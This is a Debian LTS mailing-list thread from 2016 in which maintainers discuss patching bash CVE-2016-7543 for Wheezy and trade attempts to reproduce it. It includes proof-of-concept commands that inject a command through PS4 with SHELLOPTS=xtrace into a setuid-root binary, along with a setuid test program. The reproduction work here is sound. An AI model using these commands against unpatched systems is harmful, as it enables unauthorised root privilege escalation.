[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Wheezy update of bash?

Hi Ola,

2016-10-06 23:08 GMT+02:00 Ola Lundqvist <ola@inguza.com>:
> Hi Matthias and Balint
>
> I have tried to reproduce the problem described in the openwall email.
> However I can not reproduce it. Have you been able to?
>
> On wheezy:
> ------------
> ola@tigereye:/$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
> Thu Oct  6 20:54:07 UTC 2016
> ola@tigereye:/$ ls -la test
> -rwsr-xr-x 1 root root 6824 Oct  6 20:52 test
> ola@tigereye:/$ dpkg -l bash
> ...CUT...
> ii  bash           4.2+dfsg-0.1 amd64        GNU Bourne Again SHell
>
> On jessie:
> ola@tigereye:~/exploit$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
> Thu Oct  6 22:48:35 CEST 2016

When I set the default shell to bash it worked for me.
Please try with sudo dpkg-reconfigure dash.

> ola@tigereye:~/exploit$ dpkg -l bash
> ...CUT...
> ii  bash           4.3-11+b1    amd64        GNU Bourne Again SHell
>
> I think it may be because SHELLOPTS is a read-only variable.
>
> ola@tigereye:~/exploit$ SHELLOPTS=xtrace
> bash: SHELLOPTS: readonly variable
>
> Do you think I have made a mistake in the reproduction or is it so that the
> patch was actually not on a real problem (at least in Debian).
>
> Not even if I change the code like this:
> ola@tigereye:~/exploit$ gcc -xc - -otest2 <<< 'int main() { setuid(0);
> system("/bin/bash -c /bin/date"); }'
> ola@tigereye:~/exploit$ ./test2
> Thu Oct  6 23:04:11 CEST 2016
> ola@tigereye:~/exploit$ set -x
> ola@tigereye:~/exploit$ ./test2
> uid=1000(ola) gid=1000(ola)
> groups=1000(ola),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)./test2
> Thu Oct  6 23:04:18 CEST 2016

This runs the command passed in PS4 thus I consider this a reproduction.

Cheers,
Balnit

>
> My conclusion is that there is no security hole. But I may be mistaken.
>
> Can anyone else reproduce the issue?
>
> Best regards,
>
> // Ola
>
> On 6 October 2016 at 12:29, Ola Lundqvist <ola@inguza.com> wrote:
>>
>> Hi Matthias
>>
>> I will look into this.
>>
>> // Ola
>>
>> On 6 October 2016 at 01:06, Matthias Klose <doko@debian.org> wrote:
>>>
>>> On 05.10.2016 16:02, Balint Reczey wrote:
>>> > Hello dear maintainer(s),
>>> >
>>> > the Debian LTS team would like to fix the security issues which are
>>> > currently open in the Wheezy version of bash:
>>> > https://security-tracker.debian.org/tracker/CVE-2016-7543
>>> >
>>> > Would you like to take care of this yourself?
>>>
>>> please go ahead.
>>>
>>> Matthias
>>>
>>
>>
>>
>> --
>>  --- Inguza Technology AB --- MSc in Information Technology ----
>> /  ola@inguza.com                    Folkebogatan 26            \
>> |  opal@debian.org                   654 68 KARLSTAD            |
>> |  http://inguza.com/                Mobile: +46 (0)70-332 1551 |
>> \  gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9  /
>>  ---------------------------------------------------------------
>>
>
>
>
> --
>  --- Inguza Technology AB --- MSc in Information Technology ----
> /  ola@inguza.com                    Folkebogatan 26            \
> |  opal@debian.org                   654 68 KARLSTAD            |
> |  http://inguza.com/                Mobile: +46 (0)70-332 1551 |
> \  gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9  /
>  ---------------------------------------------------------------
>
Reply to: